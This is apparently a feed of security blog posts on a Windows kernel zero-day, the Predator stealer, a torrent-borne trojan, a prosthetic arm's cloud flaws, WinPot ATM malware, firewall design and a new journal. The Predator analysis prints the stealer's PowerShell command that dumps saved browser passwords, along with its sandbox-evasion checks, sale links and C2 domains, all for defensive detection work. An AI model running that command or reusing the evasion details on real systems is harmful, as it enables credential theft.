      Snippet of NtDCompositionDestroyConnection syscall inner function (Windows 8.1)

      On this screenshot with the simplified logic of the function DiscardAllCompositionFrames that is called from within the NtDCompositionDestroyConnection syscall you can see that it does not acquire the necessary lock and calls the function DiscardAllCompositionFrames that will release all allocated frames. The problem lies in the fact that when the syscalls NtDCompositionDiscardFrame and NtDCompositionDestroyConnection are executed simultaneously, the function DiscardAllCompositionFrames may be executed at a time when the NtDCompositionDiscardFrame syscall is already looking for a frame to release or has already found it. This condition leads to a use-after-free scenario.

      Interestingly, this is the third race condition zero-day exploit used by the same group in addition to CVE-2018-8589 and CVE-2018-8611.

      Stop execution if module file name contains substring “chrome.exe”

      The exploit that was found in the wild was targeting 64-bit operating systems in the range from Windows 8 to Windows 10 build 15063. The exploitation process for all those operating systems does not differ greatly and is performed using heap spraying palettes and accelerator tables with the use of GdiSharedHandleTable and gSharedInfo to leak their kernel addresses. In exploitation of Windows 10 build 14393 and higher windows are used instead of palettes. Besides that, that exploit performs a check on whether it’s running from Google Chrome and stops execution if it is because vulnerability CVE-2019-0797 can’t be exploited within a sandbox.

      A predatory tale: Who’s afraid of the thief?

      In mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who initially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is that it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was apparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a C2 using a stealer dubbed ‘Predator’.

      As soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory dumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about this tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main findings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s versions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide general information about its owners’ activities.

      As well as all the information we collected from the client, we went the extra mile and contacted a source who had previously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and 2.3.7 in his blog just a few months ago (October 2018).

      He joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new versions of ‘Predator the thief’.

      The blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account named Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries until fairly recently.

      Predator the thief

      Predator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has been detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly adapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim attack vector and are only selling the builder. For a small additional payment they can also generate an administration panel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a little-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for triggers to show up.

      latest version v3.0.7
      Sample MD5 bf4cd781920f2bbe57e7e74a775b8e94
      Code Language C++
      File Types PE
      Supported Arch. x86 and x64
      Unpacked Size <500Kb
      Admin Panel Example https://predatortop.xyz/login
      Admin Panel Software PHP, Apache, Ubuntu

      From v2 to v3

      Predator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far as large companies go, protection solutions and response teams can detect and remove its activity in a relatively short amount of time.

      That said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to extend features and adjusting to client requirements and are generally not that aggressive when it comes to disclosure/analysis of their tool.

      Obfuscation

      Predator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, Substitutions, Stack strings and more are being used to hide API methods, Folder paths, Register keys, the C2 server/Admin panel and so on.

      We sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API call, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.

      We’ve written down a list for those who are after a step-by-step guide:

      Step Description
      0 Saving arguments somewhere
      1 Get the function name
      2 Get the library name
      3 Recreating GetProcAddress
      4 Calling function by a simple register call

      Export table

      It was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:

      Anti-debugging/sandbox checks

      Predator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for example, is a hardcoded list of DLLs that are checked if loaded into memory:

      sbiedll dbghelp api_log pstorec dir_watch vmcheck wpespy SxIn Sf2

      Loop for checking list of DLLs

      One old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.

      Classy but mandatory – browser stealer support

      Edge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, are different from the malware decision-making with the Gecko and Chromium browsers. In previous versions, Predator usually uses a temporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced with a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository..

      powershell.exe -Command 
      "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List Resource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName :', 'Login:').Replace('Password :', 'Password:'); $c > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"

      As a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’ sales page:

      The false keylogger feature

      The owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that no keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a crawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named ‘information.log’.

      Thief logs

      Diving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The information logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on the victim machine.

      We noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers, such as:

      • HWID
      • System Language
      • Keyboard Layout

      At the end of the report, the owners added a customer/payload ID – probably to improve support.

      Updates

      Predator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its popularity. Here’s a summary of the new features in v3:

      Location Data stolen
      Games Osu
      Battle.net
      FTP WinSCP
      VPN NordVPN
      2FA Authy
      Messengers Pidgin
      Skype
      Operating System Webcam
      HWID
      Clipboard
      Specific document files (Grabber)
      Project filenames*
      Browsers IE/Edge

      *We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files usually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.

      Sale point (Russian forums)

      We found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and the content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you banned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.

      It was also appears that each offer on the forum must go through a reviewer who decides if the piece of software or service is of financial benefit to the forum administrators, but at the same time fair towards other members.

      For 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles (~$1,500), the commission decreases to 10%.

      The Predator stealer’s main sales thread was found here:

      https://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/

      Predator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer install the C&C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers are proactive in delivering updates and ensuring a fast and effective support service.

      Telegram as a service

      Predator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting over 370 members in this group:

      https://t.me/PredatorSoftwareChannel

      Another update channel is the seller @sett9.

      It appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of their stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products as: Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by heuristics.

      https://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992

      https://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0

      The executables above were not found in VirusTotal. According to the group, the links were posted around August of last year (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.

      On the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the owners’ release notes, it was implemented with WinSCP and NordVPN support.

      IOCs

      IP/Domains:

      Predator version IP/Domain
      v3.0.3 15charliescene15[.]myjino[.]ru
      v3.0.4 axixaxaxu1337[.]us
      v3.0.5 madoko[.]jhfree[.]net
      v3.0.6 kristihack46[.]myjino[.]ru
      v3.0.7 j946104[.]myjino[.]ru

      Hashes:

      Predator version MD5 Hash
      v3.0.3 c44920c419a21e07d753ed607fb6d7ca
      v3.0.4 cf2273b943edd0752a09e90f45958c85
      v3.0.5 b2cbb3d80c8d830a3b3c2bd568ba1826
      v3.0.6 dff67a78bb4866f9da5a0c1781ed5348
      v3.0.7 25F9EC882EAC441D4852F92E0EAB8595

      Yara:

      rule Predator_The_Thief : Predator_The_Thief {
         meta:
             description = "Yara rule for Predator The Thief 3.0.0+"
             author = "Fumik0_"
             date = "2018/10/12"
             update = "2019/02/26"
         strings:
             $mz = { 4D 5A }
      
             /*
                 Predator V3.0.0+
             */
      
             $x1 = { C6 84 24 ?? ?? 00 00 8C }
             $x2 = { C6 84 24 ?? ?? 00 00 1A } 
             $x3 = { C6 84 24 ?? ?? 00 00 D4 }
             $x4 = { C6 84 24 ?? ?? 00 00 03 } 
             $x5 = { C6 84 24 ?? ?? 00 00 B4 }
             $x6 = { C6 84 24 ?? ?? 00 00 80 }
             /*
                 Predator V3.0.3 -&gt; 3.0.6
             */
             $y1 = { B8 00 E1 F5 05 }
             $y2 = { 89 5C 24 0C }
             $y3 = { FF 44 24 ?? }
             $y4 = { 39 44 24 0C } 
             $y5 = { BF 00 00 A0 00 }
         condition:
             $mz at 0 and
             (
                  ( all of ($x*))
                  or
                  (all of ($y*))
             )
      }

      Report: China, Like Russia, Uses Social Media to Sway U.S. Public Opinion

      Russia isn’t the only nation using social media sites like Facebook, Twitter and Instagram to spread its political message across in the United States; China also is using social media–albeit in different ways–to sway public opinion and make the Communist country look favorable to the American public, research has found....

      Read the whole entry... »

      Related Stories

      Pirate matryoshka

      The use of torrent trackers to spread malware is a well-known practice; cybercriminals disguise it as popular software, computer games, media files, and other sought-after content. We detected one such campaign early this year, when The Pirate Bay (TPB) tracker filled up with harmful files used to distribute malware under the guise of cracked copies of paid programs.

      Malicious torrents in the TPB index

      We noticed that the tracker contained malicious torrents created from dozens of different accounts, including ones registered on TBP for quite some time.

      Description of a malicious torrent

      Torrent content

      Instead of the expected software, the file downloaded to the user’s computer was a Trojan, whose basic logic was implemented by SetupFactory installers. Our security solutions detect the malware as Trojan-Downloader.Win32.PirateMatryoshka.


      Generalized algorithm of the PirateMatryoshka sample

      At the initial stage, the installer decrypts another SetupFactory installer for displaying a phishing web page.

      Retrieving the first malicious component

      The page opens directly in the installation window and requests the user’s TBP account credentials, supposedly to continue the process.

      Phishing page to obtain TBP accounts

      The compromised accounts were most likely used by the cybercriminals to spread more malicious torrents on the resource — we noted above that not only newly created accounts were used for this purpose.

      Before performing the next step, PirateMatryoshka verifies that it is running in the attacked system for the first time. To do so, it checks the registry for the path HKEY_CURRENT_USER\Software\dSet. If it exists, further execution is terminated. If the checking result is negative, the installer prods the pastebin.com service for a link to the additional module and its decryption key.

      Retrieving the second malicious component

      The second downloaded component is also a SetupFactory installer, used to decrypt and run four PE files in sequence:

      The modules are run by the second malicious component

      The second and fourth of these files are downloaders for the InstallCapital and MegaDowl file partner programs (classified by us as Adware). They usually make their way to users through file sharing sites — besides downloading the required content, their goal is to install additional software while carefully hiding the option to cancel. For example, in InstallCapital the full list of installable software is placed at the end of the license agreement:

      Full list of installable software in InstallCapital

      And in MegaDowl, the list is hidden behind the seemingly inactive Advanced settings button:

      Full list of installable software in MegaDowl

      The other two files are autoclickers written in VisualBasic, which are required to prevent the user from canceling the installation of the additional software (in which case the cybercriminals go empty-handed). The autoclickers are run before the installers; when the installer windows are detected, they check the boxes and click the buttons needed to give the user’s consent to install the unnecessary software.

      Searching for partner downloader windows and clicking them

      As a result of PirateMatryoshka’s efforts, the victim computer is flooded with unwanted programs that pester the user and waste system resources. On a separate note, the owners of file partner programs often do not track the programs offered in their downloaders. Our research shows that one in five files offered by partner installers is malicious — among those we encountered pBot, Razy, and others.

      Example of what a partner program downloader can do

      Conclusion

      Cybercriminals are always coming up with new kinds of fraud. In this particular case, they employed a method for delivering malicious content through torrent trackers to install adware on user computers. As a result, many TPB users not only picked up adware or malware on their machines, but had their accounts compromised.

      Kaspersky Lab solutions detect PirateMatryoshka and its components with the following verdicts:

      Trojan-Downloader.Win32.PirateMatryoshka
      Trojan.Win32.InstClick
      AdWare.Win32.StartSurf
      AdWare.Win32.SmartInstaller
      AdWare.Win32.Generic

      IOCs

      66860309953dc7cd7faee88ec90a81f6
      7576b8677975261fbb1e799d0231ec01
      64dc8f3197607dbf652b985edb99ad4e
      035cff7c52460a69f77a0a09db05a6f7
      a85f90f07dd9e8aab51c65d8287ec6be
      a857ae5cb87b23359ed70b8177aa44d3
      45d4df9b38a8f8da385714f32415cd34

      Phishing domain

      www.mobilekey[.]pw

      How to Attack and Defend a Prosthetic Arm

      The IoT world has long since grown beyond the now-ubiquitous smartwatches, smartphones, smart coffee machines, cars capable of sending tweets and Facebook posts and other stuff like fridges that send spam. Today’s IoT world now boasts state-of-the-art solutions that quite literally help people. Take, for example, the biomechanical prosthetic arm made by Motorica Inc. This device helps people who have lost their limb to restore movement.

      Via dedicated sensors, the biomechanical prosthetic arm reads the muscle contraction parameters and analyzes them to produce movements with the robotic fingers. The arm takes little time to get used to standard movements, after which it becomes a full-fledged assistant.

      Like other IoT devices, the prosthetic arm sends statistics to the cloud, such as movement amplitudes, the arm’s positions, etc. And just like other IoT devices, this valuable invention must be checked for vulnerabilities.

      In our research, we focused on those attack vectors that can be implemented without the arm owner’s knowledge. Below is a standard diagram of the arm’s interactions with the outside world.

      Each arm is equipped with an embedded SIM card for sending statistical data. The SIM is needed to access the internet and send statistics and other information about the arm’s status. A connection is established to Motorica’s remote cloud, which is an interface for remotely monitoring the status of all registered biomechanical arms. Good thing about the arm’s current architecture – the connection between the arm and the cloud in unidirectional. This means that only the arm is sending data to the cloud, while the cloud sends nothing back. Yet, Motorica Inc says, they plan to implement this feature later.

      The basic logic of the arm, such as movement directions, switching motors on or off, etc., are implemented in the C language. The cloud for receiving, processing and storing information is implemented based on the following technologies:

      • NodeJS – for backend,
      • ReactJS – for frontend,
      • MongoDB – database.

      Arm-wrestling

      At first, we decided to attack the logic of the arm. But soon we discovered that the C code is well-structured and has no vulnerabilities in it. However, the arm that we tested has only the basic functionality. Motorica Inc. wants to add more functions to its biomechanical limbs: smartphone interconnect, contactless payments and other useful features. From our point of view, all these new technologies must be tested for cybersecurity. Especially the ones that could be exploited for MiTM attacks.

      Then we started to analyze the protocol used to send the statistics to the cloud and the logic for processing that information on the server. The initial findings showed that the data was sent using the insecure HTTP protocol. A little later we found some incorrect account operations and insufficient input validation that can be used by a remote attacker to:

      • gain access to information about all the accounts in the cloud including the logins and passwords (in plaintext) for all the prosthetic arms and administrators,
      • add or delete regular and privileged users (with administrator rights),
      • launch attacks against administrators via the cloud and then attack Motorica’s internal infrastructure,
      • NoSQL-injection,
      • cause denial of service for cloud administrator.

      In our research we did not go deep into data analysis transferred between muscle sensors and the arm itself or study how the device is interconnected with contactless payment systems or smartphones. These look like very promising research fields for the next years.

      What type of attackers might be interested in such attacks – getting prosthetic arm’ data? It’s difficult to say at this moment. However, when biomechanical limbs become more intelligent – attacks could be more beneficial to their perpetrators. Or, when it gets connected to the neuro-implanted brain-chip, the remote attacker will get access to something more valuable than money. Anyway, all IoT devices (and especially biomechanical ones) should be tested for cybersecurity issues at every stage of development.

      If you create amazing technologies that are bigger and more important than just classical IoT devices, that help people, or even save lives – you have to check how your technology works, and whether there is a chance to attack your device and damage people. To prevent basic vulnerabilities, please follow the best coding practices, implement SDL, do security source code review, create a security champion in your development team, do external vulnerability researches and penetration testing. All these useful and much needed steps will increase the cybersecurity level of your devices and technologies.

      ATM robber WinPot: a slot machine instead of cutlets

      Automation of all kinds is there to help people with their routine work, make it faster and simpler. Although ATM fraud is a very peculiar sort of work, some cybercriminals spend a lot of effort to automate it. In March 2018, we came across a fairly simple but effective piece of malware named WinPot. It was created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes. We called it ATMPot.

      Example of WinPot interface – dispensing in action

      The criminals had clearly spent some time on the interface to make it look like that of a slot machine. Likely as a reference to the popular term ATM-jackpotting, which refers to techniques designed to empty ATMs. In the WinPot case, each cassette has a reel of its own numbered 1 to 4 (4 is the max number of cash-out cassettes in an ATM) and a button labeled SPIN. As soon as you press the SPIN button (in our case it is greyed out because we are actually dispensing cash), the ATM starts dispensing cash from the corresponding cassette. Down from the SPIN button there is information about the cassette (bank note value and the number of bank notes in the cassette). The SCAN button rescans the ATM and updates the numbers under the SLOT button, while the STOP button stops the dispensing in progress.

      We found WinPot to be an amusing and interesting ATM malware family, so we decided to keep a close eye on it.

      Over the course of time, new samples popped up, each one with minor modifications. For example, a changed packer (like Yoda and UPX) or updated time period during which the malware was programmed to work (e.g, during March). If system time does not fall in with the preset period, WinPot silently stops operating without showing its interface.

      The number of samples we had found was also reflected in the European Fraud Update published in the summer of 2018. It has a few lines about WinPot:

      “ATM malware and logical security attacks were reported by nine countries. Five of the countries reported ATM related malware. In addition to Cutlet Maker (used for ATM cash-out) a new variant called WinPot has been reported…”

      Same as Cutler Maker, WinPot is available on the (Dark)net for approximately 500 – 1000 USD depending on offer.

      One of the sellers offers WinPot v.3 together with a demo video depicting the “new” malware version along with a still unidentified program with the caption “ShowMeMoney”. Its looks and mechanics seem quite similar to those of the Stimulator from the CutletMaker story.

      Unidentified Stimulator-like sample from demo video

      Winpot v3 sample from demo video

      Due to the nature of ATM cash-out malware, its core functionality won’t change much. But criminals do encounter problems, so they invent modifications:

      • To trick the ATM security systems (using protectors or other ways to make each new sample unique);
      • To overcome potential ATM limitations (like maximum notes per dispense);
      • To find ways to keep the money mules from abusing their malware;
      • To improve the interface and error-handling routines.

      We thus expect to see more modifications of the existing ATM malware. The preferred way of protecting the ATM from this sort of threat is to have device control and process whitelisting software running on it. The former will block the USB path of implanting the malware directly into the ATM PC, while the latter will prevent execution of unauthorized software on it. Kaspersky Embedded Systems Security will further help to improve the security level of the ATMs.

      Kaspersky Lab products detect WinPot and its modifications as Backdoor.Win32.ATMPot.gen

      Sample MD5:
      821e593e80c598883433da88a5431e9d

      Firewalls and the Need for Speed

      I was looking for resources on campus network design and found these slides (pdf) from a 2011 Network Startup Resource Center presentation. These two caught my attention:



      This bothered me, so I Tweeted about it.

      This started some discussion, and prompted me to see what NSRC suggests for architecture these days. You can find the latest, from April 2018, here. Here is the bottom line for their suggested architecture:






      What do you think of this architecture?

      My Tweet has attracted some attention from the high speed network researcher community, some of whom assume I must be a junior security apprentice who equates "firewall" with "security." Long-time blog readers will laugh at that, like I did. So what was my problem with the original recommendation, and what problems do I have (if any) with the 2018 version?

      First, let's be clear that I have always differentiated between visibility and control. A firewall is a poor visibility tool, but it is a control tool. It controls inbound or outbound activity according to its ability to perform in-line traffic inspection. This inline inspection comes at a cost, which is the major concern of those responding to my Tweet.

      Notice how the presentation author thinks about firewalls. In the slides above, from the 2018 version, he says "firewalls don't protect users from getting viruses" because "clicked links while browsing" and "email attachments" are "both encrypted and firewalls won't help." Therefore, "since firewalls don't really protect users from viruses, let's focus on protecting critical server assets," because "some campuses can't develop the political backing to remove firewalls for the majority of the campus."

      The author is arguing that firewalls are an inbound control mechanism, and they are ill-suited for the most prevalent threat vectors for users, in his opinion: "viruses," delivered via email attachment, or "clicked links."

      Mail administrators can protect users from many malicious attachments. Desktop anti-virus can protect users from many malicious downloads delivered via "clicked links." If that is your worldview, of course firewalls are not important.

      His argument for firewalls protecting servers is, implicitly, that servers may offer services that should not be exposed to the Internet. Rather than disabling those services, or limiting access via identity or local address restrictions, he says a firewall can provide that inbound control.

      These arguments completely miss the point that firewalls are, in my opinion, more effective as an outbound control mechanism. For example, a firewall helps restrict adversary access to his victims when they reach outbound to establish post-exploitation command and control. This relies on the firewall identifying the attempted C2 as being malicious. To the extent intruders encrypt their C2 (and sites fail to inspect it) or use covert mechanisms (e.g., C2 over Twitter), firewalls will be less effective.

      The previous argument assumes admins rely on the firewall to identify and block malicious outbound activity. Admins might alternatively identify the activity themselves, and direct the firewall to block outbound activity from designated compromised assets or to designated adversary infrastructure.

      As some Twitter responders said, it's possible to do some or all of this without using a stateful firewall. I'm aware of the cool tricks one can play with routing to control traffic. Ken Meyers and I wrote about some of these approaches in 2005 in my book Extrusion Detection. See chapter 5, "Layer 3 Network Access Control."

      Implementing these non-firewall-based security choices requries a high degree of diligence, which requires visibility. I did not see this emphasized in the NSRC presentation. For example:


      These are fine goals, but I don't equate "manageability" with visibility or security. I don't think "problems and viruses" captures the magnitude of the threat to research networks.

      The core of the reaction to my original Tweet is that I don't appreciate the need for speed in research networks. I understand that. However, I can't understand the requirement for "full bandwidth, un-filtered access to the Internet." That is a recipe for disaster.

      On the other hand, if you define partner specific networks, and allow essentially site-to-site connectivity with exquisite network security monitoring methods and operations, then I do not have a problem with eliminating firewalls from the architecture. I do have a problem with unrestricted access to adversary infrastructure.

      I understand that security doesn't exist to serve itself. Security exists to enable an organizational mission. Security must be a partner in network architecture design. It would be better to emphasize enhance monitoring for the networks discussed above, and think carefully about enabling speed without restrictions. The NSRC resources on the science DMZ merit consideration in this case.

      ACM Digital Threats: Research and Practice

      CERT/CC is very excited to announce a new journal in collaboration with ACM called ACM Digital Threats, Research and Practice.

      The journal (DTRAP) is a peer-reviewed journal that targets the prevention, identification, mitigation, and elimination of digital threats. DTRAP promotes the foundational development of scientific rigor in digital security by bridging the gap between academic research and industry practice. The journal welcomes the submission of scientifically rigorous manuscripts that address extant digital threats, rather than the laboratory model of potential threats. To be accepted for publication, manuscripts must demonstrate scientific rigor and present results that are reproducible.

      DTRAP invites researchers and practitioners to submit manuscripts that present scientific observations about the identification, prevention, mitigation, and elimination of digital threats in all areas, including computer hardware, software, networks, robots, industrial automation, firmware, digital devices, etc. For articles involving analysis, the journal requires the use of relevant data and the demonstration of the importance of the results. For articles involving the results of structured observation, the journal requires explicit inclusion of rigorous practices, for example, experiments should clearly describe why internal validity, external validity, containment and transparency hold for the experiment described.

      Topics relevant to the journal include, but are not limited to:

      • Network Security
      • Web-based threats
      • Point-of-sale threats
      • Closed-network threats
      • Malicious software analysis
      • Exploit analysis
      • Vulnerability analysis
      • Adversary tactics
      • Threat landscape studies
      • Criminal ecosystem studies
      • Virus response patterns
      • Adversary attack patterns
      • Studies of security operations processes/practices/TTPs
      • Assessment and measurement of security architectures/organization security posture
      • Threat information management and sharing
      • Security services or threat intelligence ecosystem studies
      • Impact of new technologies/protocols on the threat landscape

      For further information and to submit your paper, visit Manuscript Central or write to dtrap-editors@acm.org